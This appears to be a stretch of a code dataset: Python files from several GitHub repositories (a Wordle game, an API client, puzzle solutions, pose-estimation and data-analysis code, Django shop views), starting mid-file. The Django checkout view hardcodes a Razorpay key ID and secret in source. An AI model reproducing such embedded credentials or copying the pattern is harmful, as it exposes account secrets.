-----------------------#\n#-----------------------------------------------------------------------------#\n\nprint('Testing forward...', end=' ', flush=True)\nbatch = utils.batchify(dataset[0])\n\nloss, _ = diffusion.loss(*batch)\nloss.backward()\nprint('✓')\n\n#-----------------------------------------------------------------------------#\n#--------------------------------- main loop ---------------------------------#\n#-----------------------------------------------------------------------------#\n\nn_epochs = int(args.n_train_steps // args.n_steps_per_epoch)\n\nfor i in range(n_epochs):\n print(f'Epoch {i} / {n_epochs} | {args.savepath}')\n trainer.train(n_train_steps=args.n_steps_per_epoch)\n","repo_name":"qianlin04/Safe-offline-RL-with-diffusion-model","sub_path":"scripts/train_cost_values.py","file_name":"train_cost_values.py","file_ext":"py","file_size_in_byte":5262,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"78"} +{"seq_id":"42789692170","text":"import os, sys\nimport datetime\nimport glob\nfrom pprint import pprint\nimport re\n\nimport requests\n\nfrom creds import *\n\nBASE_URL = \"https://api.imageshack.com/v2/\"\n\nclass ImageShackError(Exception):\n def __init__(self, response):\n self.response = response\n\nclass ImageShackConnectionError(Exception): pass\n\nclass ImageShack:\n\n def __init__(self, username=USERNAME, auth_token=AUTH_TOKEN, api_key=API_KEY):\n self.username = username\n self.auth_token = auth_token\n self.api_key = api_key\n self.base_url = BASE_URL\n\n def get(self, relative_url, **kwargs):\n url = self.base_url + relative_url\n params = {\"api_key\" : self.api_key, \"auth_token\" : self.auth_token} ##, \"public\" : False}\n params.update(kwargs)\n try:\n response = requests.get(url, params=params)\n except requests.exceptions.ConnectionError:\n raise ImageShackConnectionError()\n if not response.json()['success']:\n raise ImageShackError(response)\n return response\n\n def post(self, relative_url, **kwargs):\n url = self.base_url + relative_url\n params = {\"auth_token\" : self.auth_token, \"api_key\" : self.api_key}\n files = dict((\"File %s\" % i, f) for (i, f) in enumerate(kwargs.pop(\"files\", []), 1))\n params.update(kwargs)\n try:\n response = requests.post(url, data=params, files=files)\n except requests.exceptions.ConnectionError:\n raise ImageShackConnectionError()\n if not response.json()['success']:\n raise ImageShackError(response)\n return response\n\n def create_album(self, album_name):\n return self.post(\"albums\", title=album_name)\n\n def upload(self, filepath, name, album_name, tags):\n with open(filepath, \"rb\") as f:\n return self.post(\n \"images\",\n files=[f],\n album=album_name,\n title=name,\n tags=\",\".join(tags),\n public=False\n )\n\n def image(self, image_id):\n response = self.get(\"images/%s\" % image_id)\n info = response.json()['result']\n image_url = \"http://\" + info['direct_link']\n filename = info['original_filename']\n image_response = requests.get(image_url)\n image_response.raise_for_status()\n info['image_bytes'] = bytes(image_response.content)\n return info\n\nclass ImageShackUser(ImageShack):\n\n def __init__(self, username=USERNAME, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.username = username\n self.base_url += \"/user/\" + self.username + \"/\"\n\n def albums(self):\n response = self.get(\"albums\", show_private=True)\n albums = response.json()['result']['albums']\n return dict((a['id'], a['title']) for a in albums)\n\n def tags(self):\n response = self.get(\"tags\", limit=1000000, offset=0, image_limit=50)\n tags = response.json()['result']['tags']\n tag_info = {}\n for tag, info in tags.items():\n images = info['images']\n tag_info[tag] = [image['id'] for image in images]\n return tag_info\n\n def tag_images(self, tag_name):\n response = self.get(\"tags/%s\" % tag_name, limit=1000000, offset=0)\n return response.json()['result']\n\nif __name__ == '__main__':\n #\n # By way of a sanity check, attempt to connect to ImageShack\n #\n shack = ImageShack()\n print(\"Connected to %s with username %s\" % (shack.base_url, shack.username))\n","repo_name":"tjguk/imageshack-uploader","sub_path":"imageshack.py","file_name":"imageshack.py","file_ext":"py","file_size_in_byte":3543,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"20426038226","text":"from random import choice\nfrom colorama import Back, Style, Fore, init\n\n# Resets my color/styles at the end of their respective lines\ninit(autoreset=True)\n\n# Imports Mac built-in word list, filters to get only 5 letter words, then 'choice' chooses a random 5 letter word\nword_list = [line.strip() for line in open(\"/usr/share/dict/words\")]\nfiltered_list = choice(list(filter(lambda x: len(x) == 5, word_list)))\n\n# Method to get the word from the user, checks to make sure it's a string and only 5 letters long, returns it as an uppercase word using '.upper'\ndef user_guess():\n while True:\n player_guess = input(\"Enter a 5 letter word! \")\n if type(player_guess) != str or len(player_guess) != 5:\n print(\"Invalid word, try again!\")\n continue\n else:\n return player_guess.upper()\n\n\n# -----START OF GAME-----will be brought here at file open and also at end of each game\nplay = True\nwhile play == True:\n print()\n print(\n \"\"\"\n|-------------A Long Time Ago In a Terminal Far Far Away-------------------\n| ____ __ ____ ______ .______ _______ __ _______ |\n| \\ \\ / \\ / / / __ \\ | _ \\ | \\ | | | ____| |\n| \\ \\/ \\/ / | | | | | |_) | | .--. || | | |__ |\n| \\ / | | | | | / | | | || | | __| |\n| \\ /\\ / | `--' | | |\\ \\----.| '--' || `----.| |____ |\n| \\__/ \\__/ \\______/ | _| `._____||_______/ |_______||_______| |\n|_________________________________________________________________________|\n\"\"\"\n )\n print(\n Back.WHITE\n + Fore.BLUE\n + \" Hello there! Would you like to start a new game? Enter 'Yes' or 'Quit' \"\n )\n print()\n response = input().upper()\n print()\n if response == \"QUIT\":\n Play = False\n break\n elif response == \"YES\":\n print(Fore.BLUE + \"Great! May the Force be with you.\")\n print()\n\n # -----SET UP FOR MAIN LOOP-----\n guesses = 0\n output = [ # Create list to throw letters as strings into each index\n \"\",\n \"\",\n \"\",\n \"\",\n \"\",\n ]\n previous_guesses = []\n\n # -----MAIN LOOP-----\n while guesses < 6:\n print()\n print(\n \"You have\", 6 - guesses, \"guesses left.\"\n ) # My guesses count up, so to show number of guesses remaining I had to subtract from 6\n guess = user_guess() # Function defined above\n print()\n word = (\n filtered_list.upper()\n ) # Bring in my random word from above and set it to 'word'\n guess_list = list(guess) # ex. ['G', 'U', 'E', 'S', 'S']\n random_word = list(\n word\n ) # ex. ['H', 'E', 'L', 'L', 'O'] split my words into a strings\n guesses = guesses + 1 # For each *valid* guess increase 'guesses' by 1\n for i in range(len(random_word)): # Loops through every index of the list\n if (\n guess_list[i] == random_word[i]\n ): # If a letter of my guess word is in the correct spot of the word\n output[i] = (\n Fore.WHITE + Back.GREEN + guess_list[i] + Style.RESET_ALL\n )\n elif (\n guess_list[i] in random_word\n ): # If a letter of my guess word is in the word but not correct spot\n output[i] = (\n Fore.WHITE + Back.YELLOW + guess_list[i] + Style.RESET_ALL\n )\n else: # If a letter of my guess word is not in the word at all\n output[i] = Fore.WHITE + Back.RED + guess_list[i] + Style.RESET_ALL\n if guess_list == random_word:\n print(\n Back.WHITE\n + Fore.BLUE\n + \"The force is strong with you! The word was\",\n Fore.WHITE + Back.BLUE + \"\".join(output),\n )\n else:\n string_output = \"\".join(\n output\n ) # Join the output back together into a string\n previous_guesses.append(\n string_output\n ) # Add the output into previous guesses list\n print(\n \"\\n\".join(previous_guesses)\n ) # display output, drops each guess/output down a line so they are stacked\n print()\n random_word_string = \"\".join(random_word) #\n print(\n Back.WHITE\n + Fore.BLUE\n + \"Ouch! You lose! Try harder next time. The word was\",\n Fore.WHITE + Back.BLUE + random_word_string,\n )\n","repo_name":"alecdhansen/python_wordle","sub_path":"wordle.py","file_name":"wordle.py","file_ext":"py","file_size_in_byte":4832,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"9379873269","text":"import functools\n\ndef compare(l1: list[list|int], l2: list[list|int])->int:\n for i in range(len(l1)):\n if len(l2) <= i:\n return -1\n if type(l1[i]) == type(l2[i]):\n if type(l1[i]) == int:\n if l1[i] > l2[i]:\n return -1\n elif l2[i] > l1[i]:\n return 1\n else:\n r = compare(l1[i], l2[i])\n if r != 0:\n return r\n else:\n if type(l1[i]) == int:\n r = compare([l1[i]], l2[i])\n if r != 0:\n return r\n elif type(l2[i]) == int:\n r = compare(l1[i], [l2[i]])\n if r != 0:\n return r\n if len(l1) < len(l2):\n return 1\n return 0\n\n\nf = open(\"input.txt\", \"r\")\n\nr = 0\n\nsep1 = [[2]]\nsep2 = [[6]]\npackets = [sep1, sep2]\n\nlines = f.read().strip().splitlines()\n\nfor line in lines:\n line = line.strip()\n if line == \"\":\n continue\n \n packets.append(eval(line))\n\npackets.sort(key=functools.cmp_to_key(compare), reverse=True)\n\nr = packets.index(sep1)+1\nr *= packets.index(sep2)+1\n\nprint(r)","repo_name":"MrTip0/AdventOfCode2022","sub_path":"d13p2.py","file_name":"d13p2.py","file_ext":"py","file_size_in_byte":1180,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"71373271613","text":"foods = [\r\n\"orange\",\r\n\"apple\",\r\n\"banana\",\r\n\"strawberry\",\r\n\"grape\",\r\n\"blueberry\",\r\n\"carrot\", \r\n\"cauliflower\", \r\n\"pumpkin\",\r\n\"passionfruit\",\r\n\"mango\",\r\n\"kiwifruit\"\r\n]\r\n# QUESTION 1 \r\nprint(foods)\r\n\r\n# orange\r\nprint(foods[0])\r\n\r\n#banana\r\nprint(foods[2])\r\n\r\n#kiwi\r\nprint(foods [11])\r\n\r\n# Q4\r\nprint(foods[0:3])\r\n\r\n#Q5\r\nprint(foods[9:12])\r\n\r\nfoods2 = [\r\n\"orange\",\r\n\"apple\",\r\n\"banana\",\r\n\"strawberry\",\r\n\"grape\",\r\n\"blueberry\",\r\n[\"carrot\", \"cauliflower\", \"pumpkin\"],\r\n\"passionfruit\",\r\n\"mango\",\r\n\"kiwifruit\"\r\n]\r\n\r\nprint(foods2 [6][2])\r\n\r\n# QUESTION 2 \r\n\r\nmailing_list = [\r\n[\"Roary\", \"roary@moth.catchers\"],\r\n[\"Remus\", \"remus@kapers.dog\"],\r\n[\"Prince Thomas of Whitepaw\", \"hrh.thomas@royalty.wp\"],\r\n[\"Biscuit\", \"biscuit@whippies.park\"],\r\n[\"Rory\", \"rory@whippies.park\"],\r\n]\r\n\r\nfor item in mailing_list:\r\n print(f'{item[0]}:' f'{item[1]}')\r\n\r\n# QUESTION 3\r\n\r\nnames = [] # creates empty list called names\r\ndoneEntering = False\r\nwhile (not doneEntering):\r\n name = input(\"Enter a name:\")\r\n name = name.strip()\r\n if (name == \"\"):\r\n doneEntering = True\r\n else:\r\n names.append(name)\r\nprint(names)","repo_name":"imogeneweatherly/SheCodes_Lists_and_Loops","sub_path":"SheCodesHW_Lists.py","file_name":"SheCodesHW_Lists.py","file_ext":"py","file_size_in_byte":1103,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"16759202320","text":"\"\"\" Component 1 - Get user details v2 - based on v1\nForce user to enter an integer when inputting an age\n\"\"\"\n\nuser_name = input(\"What is your name? \")\nerror = \"Please enter a valid integer.\"\nvalid = False\n\nwhile not valid:\n try:\n user_age = int(input(\"How old are you? \"))\n\n print(f\"Your name is {user_name} and you are {user_age} years old!\")\n valid = True\n\n except ValueError:\n print(error)\n","repo_name":"carter-123/11DTC-Assessment-Maori-Quiz","sub_path":"C1_user_details_v2.py","file_name":"C1_user_details_v2.py","file_ext":"py","file_size_in_byte":427,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"9179441506","text":"from django.shortcuts import render, get_object_or_404, HttpResponse, redirect\n\nfrom django.views import View\nfrom Products.models import ShowProducts\nimport razorpay\nfrom ShoppingCart.models import Order\nfrom django.contrib.auth.decorators import login_required\nfrom django.utils.decorators import method_decorator\nfrom Products.middlewares.auth import auth_middleware\n\n# Create your views here.\n\nclass Homepage(View):\n\n def get(self, request):\n laptops = ShowProducts.objects.all()\n context = {\n \"laptops\": laptops,\n }\n print(request.session.get(\"customer\"))\n return render(request, \"productsHomepage.html\", context)\n \n \n def post(self, request):\n gettingProduct = request.POST.get(\"laptop\")\n request.session[\"laptopProduct\"] = gettingProduct\n print(request.session.get(\"laptopProduct\"))\n return redirect(\"checkoutPage\")\n\n\nclass WomenProductPage(View):\n\n def get(self, request):\n cart = request.session.get(\"cart\")\n if not cart:\n request.session[\"cart\"] = {}\n productsInfo = list(ShowProducts.objects.all())\n context = {\"womenproducts\": productsInfo}\n return render(request, \"womenProducts.html\", context)\n\n def post(self, request):\n product = request.POST.get(\"product\")\n remove = request.POST.get(\"remove\")\n cart = request.session.get(\"cart\")\n if cart:\n quantity = cart.get(product)\n if quantity:\n if remove:\n if quantity<=1:\n cart.pop(product)\n else:\n cart[product] = quantity-1\n else:\n cart[product] = quantity+1\n else:\n cart[product] = 1\n else:\n cart = {}\n cart[product] = 1\n\n request.session[\"cart\"] = cart\n print(request.session[\"cart\"])\n\n return redirect(\"womensProductPage\")\n\n\n\nclass ProductsDetailPage(View):\n\n def get(self, request, id):\n obj = get_object_or_404(ShowProducts, pk=id)\n context = {\"obj\": obj}\n return render(request, \"productDetailPage.html\", context)\n \n def post(self, request, id):\n product = request.POST.get(\"product\")\n remove = request.POST.get(\"remove\")\n cart = request.session.get(\"cart\")\n if cart:\n quantity = cart.get(product)\n if quantity:\n if remove:\n if quantity<=1:\n cart.pop(product)\n else:\n cart[product] = quantity-1\n else:\n cart[product] = quantity+1\n else:\n cart[product] = 1\n else:\n cart = {}\n cart[product] = 1\n\n request.session[\"cart\"] = cart\n print(request.session[\"cart\"])\n\n return redirect(\"/women/\"+str(id))\n\nclass CheckoutPage(View):\n @method_decorator(auth_middleware)\n def get(self, request):\n sessionGettingProduct = request.session.get(\"laptopProduct\")\n productById = ShowProducts.get_products_by_id(sessionGettingProduct)\n context = {\n \"productCheckout\": productById,\n }\n return render(request, \"checkout.html\", context)\n \n def post(self, request):\n \n # Razorpay Implementation\n productAmt = request.POST.get(\"totalAmt\")\n order_amount = productAmt\n order_currency = 'INR'\n order_receipt = 'order_rcptid_11'\n \n client = razorpay.Client(auth=(\"rzp_test_G1jXAHHxcitb1c\", \"OBWdRbrbITmt08F3aQQkF7L3\"))\n payment = client.order.create({\"amount\":order_amount, \"currency\":order_currency, \"receipt\":order_receipt})\n print(payment)\n \n return HttpResponse(\"Thankyou\")","repo_name":"aashishparyaniba/HerokuDeployment","sub_path":"Products/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3842,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"12773612241","text":"# Unpack Canvas HW for grading.\n# Bart Massey 2023\n\nimport argparse, re, json, subprocess, sys, zipfile\nfrom pathlib import Path\n\nparser = argparse.ArgumentParser(\n prog='unpack-hw',\n description='Unpack a student homework archive for grading',\n)\nparser.add_argument(\"--hw\", required=True)\nparser.add_argument(\"filename\")\nargs = parser.parse_args()\n\ndef mkfdir(root):\n fdest = Path(root)\n if fdest.is_dir():\n print(f\"directory {root} exists\", file=stderr)\n exit(1)\n fdest.mkdir(mode=0o700)\n return fdest\n\nsdest = mkfdir(\"staged\")\ngdest = mkfdir(\"graded\")\n\nstudent_names = dict()\nwith open(\"students.json\", \"r\") as s:\n s = json.load(s)\n for record in s:\n student_id = str(record[\"id\"])\n student_names[student_id] = record[\"short_name\"]\n\nfilename_re = re.compile(r\"([a-z]+)_(LATE_)?([0-9]+)_([0-9]+).*$\")\nproject_archive = zipfile.ZipFile(args.filename)\nprojects = []\nfor zipinfo in project_archive.infolist():\n fields = filename_re.search(zipinfo.filename)\n if fields is None:\n print(f\"warning: filename not parsed: {zipinfo.filename}\", file=stderr)\n continue\n slug, student_id, asg_id = fields[1], fields[3], fields[4]\n name = student_names[student_id]\n\n path = mkfdir(sdest / slug)\n\n zip = project_archive.open(zipinfo)\n with zipfile.ZipFile(zip) as zip:\n zip.extractall(path=path)\n\n grading = path / \"GRADING.txt\"\n with open(grading, \"w\") as gr:\n print(args.hw, file=gr)\n print(name, file=gr)\n print(\"-\", file=gr)\n print(file=gr)\n\n info = path / \".canvas_info\"\n with open(info, \"w\") as i:\n print(f\"{student_id},{asg_id}\", file=i)\n","repo_name":"BartMassey/canvas-hw","sub_path":"unpack-hw.py","file_name":"unpack-hw.py","file_ext":"py","file_size_in_byte":1673,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"16303225866","text":"def solution(A):\r\n A=sorted(A)\r\n max1=A[-1]*A[-2]*A[-3]\r\n if A[0]<0 and A[1]<0:\r\n max2 = A[0]*A[1]*A[-1]\r\n if max2>max1:\r\n return max2\r\n else:\r\n return max1\r\n else:\r\n return max1","repo_name":"firdausis/codility","sub_path":"max_product_of_three.py","file_name":"max_product_of_three.py","file_ext":"py","file_size_in_byte":240,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"20166883693","text":"import torch\n\nfrom mmpose.core.camera import CAMERAS\nfrom mmpose.core.camera import SimpleCameraTorch\nfrom .utils import undistortPoints_torch\n\n\n@CAMERAS.register_module()\nclass CustomSimpleCameraTorch(SimpleCameraTorch):\n def __init__(self, param, device):\n super(CustomSimpleCameraTorch, self).__init__(param, device)\n self.device = device\n\n def pixel_to_camera(self, X, left_product=False):\n assert isinstance(X, torch.Tensor)\n assert X.ndim >= 2 and X.shape[-1] == 2\n X = X.float()\n camera_matrix = torch.eye(3, device=self.device)\n camera_matrix[:2] = self.param['K'].T\n _X = X.new_ones(X.shape[0], 3)\n _X[:, :2] = self.undistort(X)\n\n _X = torch.inverse(camera_matrix) @ _X.T\n\n if left_product:\n return _X\n else:\n return _X.T\n\n def undistort(self, X):\n if self.undistortion:\n camera_matrix = torch.eye(3, device=self.device)\n camera_matrix[:2] = self.param['K'].T\n uv = X.view(1, -1, 2)\n k = self.param['k']\n p = self.param['p']\n dist = X.new_zeros(1, 5)\n # dist = np.array([[k[0], k[1], p[0], p[1], k[2]]], dtype=np.float32)\n dist[0, :2] = k[:2]\n dist[0, 2:4] = p[:2]\n dist[0, 4] = k[2]\n uv = undistortPoints_torch(uv,\n camera_matrix[None],\n dist, camera_matrix[None])[0]\n return uv\n else:\n return X\n\n def camera_to_ray(self, X, left_product=False):\n assert isinstance(X, torch.Tensor)\n assert X.ndim >= 2\n assert X.shape[0] == 3 or X.shape[-1] == 3\n if X.shape[0] == 3:\n X = X.T\n\n _X = X / (X[:, 2:] + 1e-12)\n camera_center = self.param['T_c2w'] # 1x3\n ray_direction = _X @ self.param['R_c2w'] # Nx3\n\n if left_product:\n return camera_center.T, ray_direction.T\n else:\n return camera_center, ray_direction\n","repo_name":"wusize/multiview_pose","sub_path":"multiview_pose/core/camera/single_camera_torch.py","file_name":"single_camera_torch.py","file_ext":"py","file_size_in_byte":2063,"program_lang":"python","lang":"en","doc_type":"code","stars":34,"dataset":"github-code","pt":"78"} +{"seq_id":"33527868773","text":"import sys\n\nsys_input = sys.stdin.readline\n\n\ndef solution():\n str1 = sys_input().rstrip()\n str2 = sys_input().rstrip()\n str1_len = len(str1)\n str2_len = len(str2)\n dt = [[\"\" for _s1 in range(str1_len + 1)] for _s2 in range(str2_len + 1)]\n\n for s2_idx in range(str2_len):\n for s1_idx in range(str1_len):\n if str1[s1_idx] == str2[s2_idx]:\n dt[s2_idx + 1][s1_idx + 1] = dt[s2_idx][s1_idx] + str1[s1_idx]\n else:\n dt[s2_idx + 1][s1_idx + 1] = max(dt[s2_idx][s1_idx + 1], dt[s2_idx + 1][s1_idx], key=len)\n\n result = dt[str2_len][str1_len]\n if len(result) == 0:\n print(0)\n else:\n print(len(result))\n print(result)\n\n\nsolution()\n","repo_name":"nakevin96/AlgorithmPracPython","sub_path":"2022_09/baekjoon/2022_09_16_baekjoon_9252_yoon.py","file_name":"2022_09_16_baekjoon_9252_yoon.py","file_ext":"py","file_size_in_byte":727,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"32443454579","text":"import pandas as pd\nimport numpy as np\nimport matplotlib\nmatplotlib.use('PS')\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom sklearn.linear_model import LinearRegression, Ridge\nfrom sklearn import metrics\nimport environment, dataset\nfrom dataset import Dataset\nfrom features import FeatureGenerator\n\n# captures analysis of the dataset\n# can be passed through Dataset object to preprocess\nclass DataAnalysis(object):\n def __init__(self, cols, outpath=\"output/\"):\n self.outpath = outpath\n self.cols = cols\n self.ind = ['id', 'timestamp', 'y']\n self.data_obj = Dataset()\n self.df = self.data_obj.fullset\n\n def analyze_nan(self, df_norm=None):\n # check % of NaN per feature, return dataframe containing % of NaN per feature\n # useful to look at which features to choose from\n if df_norm is None:\n df = self.df.drop(columns=self.ind)\n else:\n df = df_norm.drop(columns=self.ind) \n null_counts = df.isnull().sum()/len(df)\n null_counts = null_counts.sort_values()\n null_counts = pd.DataFrame({'Features':null_counts.index, '% Missing NaN':null_counts.values})\n null_counts.set_index('Features',inplace=True)\n plt.figure(figsize=(20,10))\n plt.xticks(np.arange(len(null_counts)),null_counts.index,rotation='vertical')\n plt.ylabel('Percentage of rows with NaN')\n plt.bar(np.arange(len(null_counts)),null_counts['% Missing NaN'])\n plt.tight_layout()\n plt.savefig(self.outpath+'missing_nan.png')\n return null_counts\n \n def analyze_corr_with_score(self):\n df = self.data_obj.preprocess(fill_method='median', scale_method='none')\n features_obj = FeatureGenerator(self.data_obj)\n train = features_obj.train\n corr_with_y = train[features_obj.features].corrwith(train.y).abs().sort_values(ascending=False).to_frame(name='corr')\n corr_with_y.index.name = 'features'\n corr_with_y.reset_index(level=0, inplace=True)\n corr_with_y['rank_corr'] = corr_with_y['corr'].rank()\n reward_df = pd.read_csv(self.outpath+'_Ridge_Reward.csv')\n reward_df['rank_reward'] = reward_df['reward'].rank()\n rank_df = pd.merge(corr_with_y, reward_df, on='features')\n top_rank_df = rank_df[(abs(rank_df['rank_corr']-rank_df['rank_reward']) < 30) & (rank_df['rank_reward'] > 0)]\n top_rank_df.to_csv(self.outpath+'_Top_Ridge_Corr_Reward_Rank.csv')\n\n # overfitting data using Ridge\n def analyze_selected_features(self):\n df = self.data_obj.preprocess(fill_method='median', scale_method='none')\n features_obj = FeatureGenerator(self.data_obj)\n train = features_obj.train\n filtered_features = features_obj.filter_features()\n top_features = filtered_features[:10]\n top_features = features_obj.features\n track_score = {}\n for feature in top_features:\n model = Ridge(fit_intercept=False, normalize=True)\n model.fit(np.array(train[feature].values).reshape(-1,1), train.y.values)\n rewards = {} \n env = environment.make(df)\n observation = env.reset()\n\n while True:\n test_x = np.array(observation.features[feature].values).reshape(-1,1)\n observation.target.y = model.predict(test_x)\n target = observation.target\n timestamp = observation.features[\"timestamp\"][0]\n if timestamp % 100 == 0:\n print(\"Timestamp #{}\".format(timestamp))\n\n observation, reward, done, info = env.step(target)\n #rewards[timestamp] = reward\n if done:\n \"\"\"\n rewards_df = pd.DataFrame.from_dict(rewards, orient='index')\n rewards_df.plot(kind='line', color='#0b3fe8', legend=None, figsize=(16,8))\n plt.xlabel('Timestamps')\n plt.ylabel('Rewards')\n plt.title('Ridge Regression Using '+feature+' [60 percent of Training + 40 percent for Testing]')\n plt.savefig(self.outpath+feature+'_lm_rewards.png')\n \"\"\"\n track_score[feature] = info['public_score']\n print(feature, track_score[feature])\n break\n rewards_df = pd.DataFrame.from_dict(track_score, orient='index', columns=['features','reward']).sort_values(by='reward', ascending=False)\n rewards_df.to_csv(self.outpath+'_Ridge_Reward.csv')\n print(rewards_df)\n\n def analyze_corr(self, df_norm=None):\n if df_norm is None:\n df, y = self.df.drop(columns=self.ind), self.df['y']\n df_features = self.df.drop(columns=self.ind + ['y'])\n else:\n df, y = df_norm.drop(columns=self.ind), df_norm['y']\n df_features = df_norm.drop(columns=self.ind + ['y'])\n\n corr = df_features.corr()\n fig = plt.figure()\n ax = fig.add_subplot(111)\n cax = ax.matshow(corr, cmap='coolwarm', vmin=-1, vmax=1)\n fig.colorbar(cax)\n ticks = np.arange(0,len(df_features.columns),1)\n ax.set_xticks(ticks)\n plt.xticks(rotation=90)\n ax.set_yticks(ticks)\n ax.set_xticklabels(df_features.columns)\n ax.set_yticklabels(df_features.columns)\n plt.savefig(self.outpath+'features_corr.png')\n\n corr = corr.abs()\n upper = corr.where(np.triu(np.ones(corr.shape), k=1).astype(np.bool))\n high_corr = [column for column in upper.columns if any(upper[column] >= 0.90)]\n return df.corrwith(y).sort_values(ascending=False)\n\n def analyze_outliers(self):\n train = environment.make().train\n y = train['y'].values\n fig = plt.figure(figsize=(12, 6))\n plt.hist(y, bins=70, color='#0b3fe8')\n plt.xlabel('Returns')\n plt.ylabel('Count')\n plt.title('Empirical Return Distribution of The Output Value Y [VIX-Related Product]')\n plt.savefig(self.outpath+'y_distribution.png')\n plt.clf()\n\n fig = plt.figure(figsize=(12, 6))\n plt.xlabel('Timestamps')\n plt.title('Output Value of Y and Timestamp')\n train = environment.make().fullset\n plt.plot(list(train['timestamp'].unique()), train.groupby('timestamp')['y'].mean(), c='blue', label='y')\n plt.plot(list(train['timestamp'].unique()), train.groupby('timestamp')['y'].std(), c='red', label='std(y)')\n plt.xlim(list(train['timestamp'].unique())[0], list(train['timestamp'].unique())[-1])\n plt.legend(framealpha=1, frameon=True)\n plt.savefig(self.outpath+'y_return_comparison.png')\n plt.clf()\n\n \"\"\"\n time_targets = train.groupby('timestamp')['y'].mean()\n plt.figure(figsize=(12, 5))\n plt.plot(time_targets)\n plt.xlabel('Timestamps')\n plt.ylabel('Mean of target')\n plt.title('Change in target over time - Red lines = new timeperiod')\n for i in timediff[timediff > 5].index:\n plt.axvline(x=i, linewidth=0.25, color='red')\n \"\"\"\n\n def security_regression(self):\n train_data, test_data = self.env.train[self.cols+self.ind], self.env.test[self.cols+self.ind]\n train_data = train_data.fillna(train_data[self.cols].dropna().median())\n test_data = test_data.fillna(test_data[self.cols].dropna().median())\n unique_id = np.unique(train_data['id'] )\n unique_id_len = len(unique_id)\n\n # fit linear regression to train on y for each security id\n security_id, mae, mse, rmse = [], [], [], []\n for i in range(unique_id_len): \n train_id = train_data[train_data['id']==unique_id[i]]\n test_id = test_data[test_data['id']==unique_id[i]]\n\n # in case test data does not contain the security id\n if len(test_id) <= 1:\n continue\n model = LinearRegression().fit(train_id[self.cols],train_id['y'])\n y_pred = model.predict(test_id[self.cols])\n security_id.append(unique_id[i])\n mae.append(metrics.mean_absolute_error(test_id['y'], y_pred))\n mse.append(metrics.mean_squared_error(test_id['y'], y_pred)) \n rmse.append(np.sqrt(metrics.mean_squared_error(test_id['y'], y_pred)))\n output = pd.DataFrame(list(zip(security_id, mae, mse, rmse)), columns=['id','mae','mse','rmse'])\n output = output.sort_values('mse',ascending=True)\n \"\"\"\n lr_model = list(train_data.groupby('id').apply(lambda df: LinearRegression().fit(df[cols], df['y'])))\n for model in lr_model:\n y_pred = model.predict(test_data[cols])\n print('Mean Absolute Error:', metrics.mean_absolute_error(test_data['y'], y_pred)) \n print('Mean Squared Error:', metrics.mean_squared_error(test_data['y'], y_pred)) \n print('Root Mean Squared Error:', np.sqrt(metrics.mean_squared_error(test_data['y'], y_pred)))\n \"\"\"\n return output\n\n\nif __name__ == \"__main__\":\n cols = ['technical_20', 'technical_30', 'technical_29', 'technical_40']\n data_analysis = DataAnalysis(cols)\n data_analysis.analyze_outliers()\n data_analysis.analyze_corr_with_score()\n data_analysis.analyze_selected_features()\n # unprocessed data\n #print(data_analysis.analyze_corr().head(6))\n #print(data_analysis.analyze_corr().tail(6))\n #top_nan_features = data_analysis.analyze_nan()\n #print(data_analysis.df.describe())\n\n # preprocessed data\n data_obj = dataset.create()\n df = data_obj.preprocess()\n data_analysis.analyze_corr(df)\n #print(data_analysis.analyze_corr(df).head(6))\n #print(data_analysis.analyze_corr(df).tail(6))\n features_obj = FeatureGenerator(data_obj)\n clusters = features_obj.cluster_corr()\n print(clusters)\n","repo_name":"NumberChiffre/SparkMLFactorInvesting","sub_path":"code/data_analysis.py","file_name":"data_analysis.py","file_ext":"py","file_size_in_byte":9838,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"19564396187","text":"import os\nimport json\nimport numpy as np\nimport pandas as pd\n\nfrom copy import deepcopy\nfrom stockanalysis.text_normalization_methods import normalize_document\n\n######################\n## Helper Functions ##\n######################\n\ndef append_vocab(document, file_path):\n \"\"\"\n Adds to the already existing vocabulary file found at :param file_path: the\n new vocabulary found in the normalized document :param document:.\n\n :param document: string, normalized document to calculate vocabulary from.\n :param file_path: string, path to vocabulary json file\n\n ---> dict, vocab object, mapping words to their unique integer encodings\n \"\"\"\n\n # Loading already established vocabulary\n try:\n with open(file_path, 'r') as f:\n vocab = json.load(f)\n\n except FileNotFoundError:\n vocab = {}\n\n # Updating vocabulary dictionary\n if not vocab:\n last_word_encoding = 0\n else:\n last_word_encoding = max(vocab.values())\n\n for word in document.split():\n # if a word in the document is not in the current vocab, add it with a\n # word encoding value larger than the largest word encoding value\n if word not in vocab:\n vocab[word] = last_word_encoding + 1\n last_word_encoding = last_word_encoding + 1\n\n with open(file_path, 'w') as f:\n json.dump(vocab, f)\n\n return vocab\n\n##########################\n## END Helper Functions ##\n##########################\n\n\n###########################################################\n## Functions for preprocessing dataset pandas.DataFrames ##\n###########################################################\n\ndef time_series_split(df, train_size=None, test_size=None):\n \"\"\"\n Splits the dataset into train, validation, and test portions.\n\n :param df: pandas.DataFrame, representing our total dataset\n :param train_size: float, training set size\n :param test_size: float, test set size\n\n ---> pandas.DataFrame, pandas.DataFrame, pandas.DataFrame, representing the train, validation, test datasets\n \"\"\"\n\n dataset_size = len(df)\n\n if test_size != None:\n testset_index = int(test_size*dataset_size)\n elif train_size != None:\n testset_index = int((1 - train_size)*dataset_size)\n else:\n raise Exception('train_size and or test_size needs to be set')\n\n test_df = df.iloc[0:testset_index].copy(deep=True)\n train_df = 